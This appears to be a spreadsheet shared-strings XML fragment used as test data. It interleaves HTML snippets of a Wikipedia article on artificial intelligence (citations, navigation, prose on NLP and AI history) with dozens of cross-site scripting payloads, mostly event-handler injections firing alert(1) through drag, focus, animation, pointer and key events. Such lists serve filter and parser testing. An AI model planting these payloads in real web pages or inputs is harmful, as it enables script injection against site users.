    <t xml:space="preserve">	 &lt;/span&gt;. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1109%2FTII.2012.2219061"&gt;10.1109/TII.2012.2219061 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=IEEE+Transactions+on+Industrial+Informatics&amp;amp;rft.atitle=An+Overview+of+Recent+Progress+in+the+Study+of+Distributed+Multi-Agent+Coordination&amp;amp;rft.volume=9&amp;amp;rft.issue=1&amp;amp;rft.pages=427-438&amp;amp;rft.date=2013-02&amp;amp;rft_id=info%3Aarxiv%2F1207.3231&amp;amp;rft_id=info%3Adoi%2F10.1109%2FTII.2012.2219061&amp;amp;rft.aulast=Cao&amp;amp;rft.aufirst=Yongcan&amp;amp;rft.au=Yu%2C+Wenwu&amp;amp;rft.au=Ren%2C+Wei&amp;amp;rft.au=Chen%2C+Guanrong&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;object draggable="true" ondragenter="alert(1)"&gt;test&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;title draggable="true" ondragstart="alert(1)"&gt;test&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;p onbeforecopy="alert(1)" contenteditable&gt;test&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;isindex onblur=alert(1) tabindex=1 id=x&gt;&lt;/isindex&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;details onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/details&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;header id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/header&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFTecuci2012" class="citation journal"&gt;Tecuci, Gheorghe (March–April 2012). "Artificial Intelligence". &lt;i&gt;Wiley Interdisciplinary Reviews: Computational Statistics &lt;/i&gt;. &lt;b&gt;4 &lt;/b&gt; (2): 168–180. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1002%2Fwics.200"&gt;10.1002/wics.200 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Wiley+Interdisciplinary+Reviews%3A+Computational+Statistics&amp;amp;rft.atitle=Artificial+Intelligence&amp;amp;rft.volume=4&amp;amp;rft.issue=2&amp;amp;rft.pages=168-180&amp;amp;rft.date=2012-03%2F2012-04&amp;amp;rft_id=info%3Adoi%2F10.1002%2Fwics.200&amp;amp;rft.aulast=Tecuci&amp;amp;rft.aufirst=Gheorghe&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;data id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;slot onmouseenter="alert(1)"&gt;test&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;dl&gt;&lt;dt&gt;&lt;a href="/wiki/Default_reasoning" class="mw-redirect" title="Default reasoning"&gt;Default reasoning &lt;/a&gt; and the &lt;a href="/wiki/Qualification_problem" title="Qualification problem"&gt;qualification problem &lt;/a&gt; &lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;meter id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;link style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;param style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;td onmousemove="alert(1)"&gt;test&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;embed id=x onfocus=alert(1) type=text/html&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFNewquist1994" class="citation book"&gt;&lt;a href="/wiki/HP_Newquist" title="HP Newquist"&gt;Newquist, HP &lt;/a&gt; (1994). &lt;i&gt;The Brain Makers: Genius, Ego, And Greed In The Quest For Machines That Think &lt;/i&gt;. New York: Macmillan/SAMS. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-672-30412-5" title="Special:BookSources/978-0-672-30412-5"&gt;&lt;bdi&gt;978-0-672-30412-5 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=The+Brain+Makers%3A+Genius%2C+Ego%2C+And+Greed+In+The+Quest+For+Machines+That+Think&amp;amp;rft.place=New+York&amp;amp;rft.pub=Macmillan%2FSAMS&amp;amp;rft.date=1994&amp;amp;rft.isbn=978-0-672-30412-5&amp;amp;rft.aulast=Newquist&amp;amp;rft.aufirst=HP&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;basefont onkeyup="alert(1)" contenteditable&gt;test&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Optical_computing" title="Optical computing"&gt;Optical computing &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">         &lt;/div&gt;           </t>
  </si>
  <si>
    <t>&lt;select ondblclick="alert(1)"&gt;test&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;span onmouseleave="alert(1)"&gt;test&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;progress onkeyup="alert(1)" contenteditable&gt;test&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;template onkeyup="alert(1)" contenteditable&gt;test&lt;/template&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;It's able to create knowledge itself': Google unveils AI that learns on its own" &lt;/a&gt;. &lt;i&gt;the Guardian &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;7 May </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Semantic_Web" title="Semantic Web"&gt;Semantic Web &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;bdi onmouseenter="alert(1)"&gt;test&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;strong style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/strong&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;video id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;html onmouseup="alert(1)"&gt;test&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;samp onpointerleave=alert(1)&gt;XSS&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Much of traditional &lt;a href="/wiki/Symbolic_artificial_intelligence" title="Symbolic artificial intelligence"&gt;GOFAI &lt;/a&gt; got bogged down on &lt;i&gt;ad hoc &lt;/i&gt; patches to &lt;a href="/wiki/Symbolic_computation" class="mw-redirect" title="Symbolic computation"&gt;symbolic computation &lt;/a&gt; that worked on their own toy models but failed to generalize to real-world results. However, around the 1990s, AI researchers adopted sophisticated mathematical tools, such as &lt;a href="/wiki/Hidden_Markov_model" title="Hidden Markov model"&gt;hidden Markov models &lt;/a&gt; (HMM), &lt;a href="/wiki/Information_theory" title="Information theory"&gt;information theory &lt;/a&gt;, and normative Bayesian &lt;a href="/wiki/Decision_theory" title="Decision theory"&gt;decision theory &lt;/a&gt; to compare or to unify competing architectures. The shared mathematical language permitted a high level of collaboration with more established fields (like &lt;a href="/wiki/Mathematics" title="Mathematics"&gt;mathematics &lt;/a&gt;, economics or &lt;a href="/wiki/Operations_research" title="Operations research"&gt;operations research &lt;/a&gt;).&lt;sup id="cite_ref-174" class="reference"&gt;&lt;a href="#cite_note-174"&gt;&amp;#91;d&amp;#93; &lt;/a&gt; &lt;/sup&gt; Compared with GOFAI, new "statistical learning" techniques such as HMM and neural networks were gaining higher levels of accuracy in many practical domains such as &lt;a href="/wiki/Data_mining" title="Data mining"&gt;data mining &lt;/a&gt;, without necessarily acquiring a semantic understanding of the datasets. The increased successes with real-world data led to increasing emphasis on comparing different approaches against shared test data to see which approach performed best in a broader context than that provided by idiosyncratic toy models; AI research was becoming more &lt;a href="/wiki/Scientific_method" title="Scientific method"&gt;scientific &lt;/a&gt;. Nowadays results of experiments are often rigorously measurable, and are sometimes (with difficulty) reproducible.&lt;sup id="cite_ref-Formal_methods_in_AI_43-1" class="reference"&gt;&lt;a href="#cite_note-Formal_methods_in_AI-43"&gt;&amp;#91;43&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-175" class="reference"&gt;&lt;a href="#cite_note-175"&gt;&amp;#91;171&amp;#93; &lt;/a&gt; &lt;/sup&gt; Different statistical learning techniques have different limitations; for example, basic HMM cannot model the infinite possible combinations of natural language.&lt;sup id="cite_ref-FOOTNOTENorvig2012_176-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTENorvig2012-176"&gt;&amp;#91;172&amp;#93; &lt;/a&gt; &lt;/sup&gt; Critics note that the shift from GOFAI to statistical learning is often also a shift away from &lt;a href="/wiki/Explainable_AI" class="mw-redirect" title="Explainable AI"&gt;explainable AI &lt;/a&gt;. In AGI research, some scholars caution against over-reliance on statistical learning, and argue that continuing research into GOFAI will still be necessary to attain general intelligence.&lt;sup id="cite_ref-FOOTNOTELangley2011_177-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTELangley2011-177"&gt;&amp;#91;173&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-FOOTNOTEKatz2012_178-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTEKatz2012-178"&gt;&amp;#91;174&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;sup onkeypress="alert(1)" contenteditable&gt;test&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;ul onbeforepaste="alert(1)" contenteditable&gt;test&lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;div class="portal" role="navigation" id="p-navigation"  aria-labelledby="p-navigation-label"&gt;</t>
  </si>
  <si>
    <t>&lt;slot onpointerleave=alert(1)&gt;XSS&lt;/slot&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=The+Atlantic&amp;amp;rft.atitle=Chatbots+Have+Entered+the+Uncanny+Valley&amp;amp;rft.date=2018&amp;amp;rft.aulast=Waddell&amp;amp;rft.aufirst=Kaveh&amp;amp;rft_id=https%3A%2F%2Fwww.theatlantic.com%2Ftechnology%2Farchive%2F2017%2F04%2Funcanny-valley-digital-assistants%2F523806%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFNorvig2012" class="citation web"&gt;&lt;a href="/wiki/Peter_Norvig" title="Peter Norvig"&gt;Norvig, Peter &lt;/a&gt; (25 June 2012). &lt;a rel="nofollow" class="external text" href="http://norvig.com/chomsky.html"&gt;"On Chomsky and the Two Cultures of Statistical Learning" &lt;/a&gt;. Peter Norvig. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20141019223259/http://norvig.com/chomsky.html"&gt;Archived &lt;/a&gt; from the original on 19 October 2014. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=unknown&amp;amp;rft.btitle=On+Chomsky+and+the+Two+Cultures+of+Statistical+Learning&amp;amp;rft.pub=Peter+Norvig&amp;amp;rft.date=2012-06-25&amp;amp;rft.aulast=Norvig&amp;amp;rft.aufirst=Peter&amp;amp;rft_id=http%3A%2F%2Fnorvig.com%2Fchomsky.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;ul ondblclick="alert(1)"&gt;test&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;custom tags onpointerenter=alert(1)&gt;XSS&lt;/custom tags&gt;</t>
  </si>
  <si>
    <t>&lt;dt onmouseup="alert(1)"&gt;test&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;em onpointerover=alert(1)&gt;XSS&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote id=x tabindex=1 onfocus=alert(1)&gt;&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;See what has changed in recent Scrapy versions.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main article: &lt;a href="/wiki/Superintelligence" title="Superintelligence"&gt;Superintelligence &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;strike id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/strike&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Philosophy and ethics </t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;The study of mechanical or &lt;a href="/wiki/Formal_reasoning" class="mw-redirect" title="Formal reasoning"&gt;"formal" reasoning &lt;/a&gt; began with &lt;a href="/wiki/Philosopher" title="Philosopher"&gt;philosophers &lt;/a&gt; and mathematicians in antiquity. The study of mathematical logic led directly to &lt;a href="/wiki/Alan_Turing" title="Alan Turing"&gt;Alan Turing &lt;/a&gt;'s &lt;a href="/wiki/Theory_of_computation" title="Theory of computation"&gt;theory of computation &lt;/a&gt;, which suggested that a machine, by shuffling symbols as simple as "0" and "1", could simulate any conceivable act of mathematical deduction. This insight, that digital computers can simulate any process of formal reasoning, is known as the &lt;a href="/wiki/Church%E2%80%93Turing_thesis" title="Church–Turing thesis"&gt;Church–Turing thesis &lt;/a&gt;.&lt;sup id="cite_ref-Formal_reasoning_28-0" class="reference"&gt;&lt;a href="#cite_note-Formal_reasoning-28"&gt;&amp;#91;28&amp;#93; &lt;/a&gt; &lt;/sup&gt; Along with concurrent discoveries in &lt;a href="/wiki/Neuroscience" title="Neuroscience"&gt;neurobiology &lt;/a&gt;, &lt;a href="/wiki/Information_theory" title="Information theory"&gt;information theory &lt;/a&gt; and &lt;a href="/wiki/Cybernetic" class="mw-redirect" title="Cybernetic"&gt;cybernetics &lt;/a&gt;, this led researchers to consider the possibility of building an electronic brain. Turing proposed changing the question from whether a machine was intelligent, to "whether or not it is possible for machinery to show intelligent behaviour".&lt;sup id="cite_ref-29" class="reference"&gt;&lt;a href="#cite_note-29"&gt;&amp;#91;29&amp;#93; &lt;/a&gt; &lt;/sup&gt; The first work that is now generally recognized as AI was &lt;a href="/wiki/Warren_McCullouch" class="mw-redirect" title="Warren McCullouch"&gt;McCullouch &lt;/a&gt; and &lt;a href="/wiki/Walter_Pitts" title="Walter Pitts"&gt;Pitts &lt;/a&gt;' 1943 formal design for &lt;a href="/wiki/Turing-complete" class="mw-redirect" title="Turing-complete"&gt;Turing-complete &lt;/a&gt; "artificial neurons".&lt;sup id="cite_ref-FOOTNOTERussellNorvig200916_30-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTERussellNorvig200916-30"&gt;&amp;#91;30&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;cite onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/cite&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;tr onclick="alert(1)"&gt;test&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;em draggable="true" ondragstart="alert(1)"&gt;test&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;track id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;iframe onkeyup="alert(1)" contenteditable&gt;test&lt;/iframe&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;AI is also being used by &lt;a href="/wiki/Corporate_finance" title="Corporate finance"&gt;corporations &lt;/a&gt;. Whereas AI &lt;a href="/wiki/CEO" class="mw-redirect" title="CEO"&gt;CEO &lt;/a&gt;'s are still 30 years away,&lt;sup id="cite_ref-320" class="reference"&gt;&lt;a href="#cite_note-320"&gt;&amp;#91;309&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-321" class="reference"&gt;&lt;a href="#cite_note-321"&gt;&amp;#91;310&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;a href="/wiki/Robotic_process_automation" title="Robotic process automation"&gt;robotic process automation &lt;/a&gt; (RPA) is already being used today in corporate finance. RPA uses artificial intelligence to train and teach software robots to process transactions, monitor compliance and audit processes automatically.&lt;sup id="cite_ref-322" class="reference"&gt;&lt;a href="#cite_note-322"&gt;&amp;#91;311&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="https://www.siemens.com/innovation/en/home/pictures-of-the-future/digitalization-and-software/autonomous-systems-infographic.html"&gt;"Autonomous Systems: Infographic" &lt;/a&gt;. &lt;i&gt;siemens.com &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;7 February </t>
  </si>
  <si>
    <t>&lt;td onbeforecut="alert(1)" contenteditable&gt;test&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;center onbeforecopy="alert(1)" contenteditable&gt;test&lt;/center&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;CNNs with 12 convolutional layers were used in conjunction with &lt;a href="/wiki/Reinforcement_learning" title="Reinforcement learning"&gt;reinforcement learning &lt;/a&gt; by Deepmind's "&lt;a href="/wiki/AlphaGo" title="AlphaGo"&gt;AlphaGo &lt;/a&gt; Lee", the program that beat a top &lt;a href="/wiki/Go_(game)" title="Go (game)"&gt;Go &lt;/a&gt; champion in 2016.&lt;sup id="cite_ref-Nature2017_258-0" class="reference"&gt;&lt;a href="#cite_note-Nature2017-258"&gt;&amp;#91;247&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem onkeydown="alert(1)" contenteditable&gt;test&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;a href="/wiki/Natural_language_processing" title="Natural language processing"&gt;Natural language processing &lt;/a&gt;&lt;sup id="cite_ref-Natural_language_processing_120-0" class="reference"&gt;&lt;a href="#cite_note-Natural_language_processing-120"&gt;&amp;#91;117&amp;#93; &lt;/a&gt; &lt;/sup&gt; (NLP) gives machines the ability to read and &lt;a href="/wiki/Natural_language_understanding" class="mw-redirect" title="Natural language understanding"&gt;understand &lt;/a&gt; human language. A sufficiently powerful natural language processing system would enable &lt;a href="/wiki/Natural-language_user_interface" title="Natural-language user interface"&gt;natural-language user interfaces &lt;/a&gt; and the acquisition of knowledge directly from human-written sources, such as newswire texts. Some straightforward applications of natural language processing include &lt;a href="/wiki/Information_retrieval" title="Information retrieval"&gt;information retrieval &lt;/a&gt;, &lt;a href="/wiki/Text_mining" title="Text mining"&gt;text mining &lt;/a&gt;, &lt;a href="/wiki/Question_answering" title="Question answering"&gt;question answering &lt;/a&gt;&lt;sup id="cite_ref-121" class="reference"&gt;&lt;a href="#cite_note-121"&gt;&amp;#91;118&amp;#93; &lt;/a&gt; &lt;/sup&gt; and &lt;a href="/wiki/Machine_translation" title="Machine translation"&gt;machine translation &lt;/a&gt;.&lt;sup id="cite_ref-Applications_of_natural_language_processing_122-0" class="reference"&gt;&lt;a href="#cite_note-Applications_of_natural_language_processing-122"&gt;&amp;#91;119&amp;#93; &lt;/a&gt; &lt;/sup&gt; Many current approaches use word co-occurrence frequencies to construct syntactic representations of text. "Keyword spotting" strategies for search are popular and scalable but dumb; a search query for "dog" might only match documents with the literal word "dog" and miss a document with the word "poodle". "Lexical affinity" strategies use the occurrence of words such as "accident" to &lt;a href="/wiki/Sentiment_analysis" title="Sentiment analysis"&gt;assess the sentiment &lt;/a&gt; of a document. Modern statistical NLP approaches can combine all these strategies as well as others, and often achieve acceptable accuracy at the page or paragraph level, but continue to lack the semantic understanding required to classify isolated sentences well. Besides the usual difficulties with encoding semantic commonsense knowledge, existing semantic NLP sometimes scales too poorly to be viable in business applications. Beyond semantic NLP, the ultimate goal of "narrative" NLP is to embody a full understanding of commonsense reasoning.&lt;sup id="cite_ref-123" class="reference"&gt;&lt;a href="#cite_note-123"&gt;&amp;#91;120&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;slot draggable="true" ondragenter="alert(1)"&gt;test&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;tr ondragover=alert(1) contenteditable&gt;drop here&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote onpointerout=alert(1)&gt;XSS&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;N. Aletras; D. Tsarapatsanis; D. Preotiuc-Pietro; V. Lampos (2016). "Predicting judicial decisions of the European Court of Human Rights: a Natural Language Processing perspective". &lt;i&gt;PeerJ Computer Science &lt;/i&gt;. &lt;b&gt;2 &lt;/b&gt;: e93. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.7717%2Fpeerj-cs.93"&gt;10.7717/peerj-cs.93 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=PeerJ+Computer+Science&amp;amp;rft.atitle=Predicting+judicial+decisions+of+the+European+Court+of+Human+Rights%3A+a+Natural+Language+Processing+perspective&amp;amp;rft.volume=2&amp;amp;rft.pages=e93&amp;amp;rft.date=2016&amp;amp;rft_id=info%3Adoi%2F10.7717%2Fpeerj-cs.93&amp;amp;rft.au=N.+Aletras&amp;amp;rft.au=D.+Tsarapatsanis&amp;amp;rft.au=D.+Preotiuc-Pietro&amp;amp;rft.au=V.+Lampos&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;kbd onmousemove="alert(1)"&gt;test&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;figure id=x tabindex=1 onfocus=alert(1)&gt;&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;html ondragover=alert(1) contenteditable&gt;drop here&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;samp onpointerup=alert(1)&gt;XSS&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;rb onpointerenter=alert(1)&gt;XSS&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Cognitive_closure_(philosophy)" title="Cognitive closure (philosophy)"&gt;Cognitive closure &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;wbr onbeforepaste="alert(1)" contenteditable&gt;test&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;content id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/content&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. Dartmouth Summer Research Conference on Artificial Intelligence &amp;#8211; via std.com, pdf scanned copy of the original. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=conference&amp;amp;rft.btitle=An+Inductive+Inference+Machine&amp;amp;rft.date=1956&amp;amp;rft.aulast=Solomonoff&amp;amp;rft.aufirst=Ray&amp;amp;rft_id=http%3A%2F%2Fworld.std.com%2F~rjs%2Findinf56.pdf&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;sub oncut="alert(1)" contenteditable&gt;test&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset onpointerdown=alert(1)&gt;XSS&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;font onmouseup="alert(1)"&gt;test&lt;/font&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt; &lt;a rel="nofollow" class="external text" href="https://ars.electronica.art/outofthebox/en/digital-humanism-conf/"&gt;Retrieved September 2019 https://ars.electronica.art/outofthebox/en/digital-humanism-conf/ Retrieved September 2019 &lt;/a&gt;&lt;span class="cs1-visible-error error citation-comment"&gt; Check &lt;code class="cs1-code"&gt;&amp;#124;url= &lt;/code&gt; value (&lt;a href="/wiki/Help:CS1_errors#bad_url" title="Help:CS1 errors"&gt;help &lt;/a&gt;) </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Video_games"&gt;Video games </t>
  </si>
  <si>
    <t>&lt;b onmouseover="alert(1)"&gt;test&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;section id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/section&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Commonsense_reasoning" title="Commonsense reasoning"&gt;Commonsense reasoning &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;aside draggable="true" ondrag="alert(1)"&gt;test&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;body onmouseup="alert(1)"&gt;test&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;content onpointerover=alert(1)&gt;XSS&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;applet onmousedown="alert(1)"&gt;test&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;marquee width=1 loop=1 onbounce=alert(1)&gt;XSS&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;ins ondblclick="alert(1)"&gt;test&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;isindex id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/isindex&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;basefont onkeypress="alert(1)" contenteditable&gt;test&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;sup onbeforecut="alert(1)" contenteditable&gt;test&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;span id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/span&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Burgess, Matt (24 August 2017). &lt;a rel="nofollow" class="external text" href="https://www.wired.co.uk/article/uk-trial-self-driving-trucks-platoons-roads"&gt;"The UK is about to Start Testing Self-Driving Truck Platoons" &lt;/a&gt;. &lt;i&gt;Wired UK &lt;/i&gt;. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20170922055917/http://www.wired.co.uk/article/uk-trial-self-driving-trucks-platoons-roads"&gt;Archived &lt;/a&gt; from the original on 22 September 2017&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;20 September </t>
  </si>
  <si>
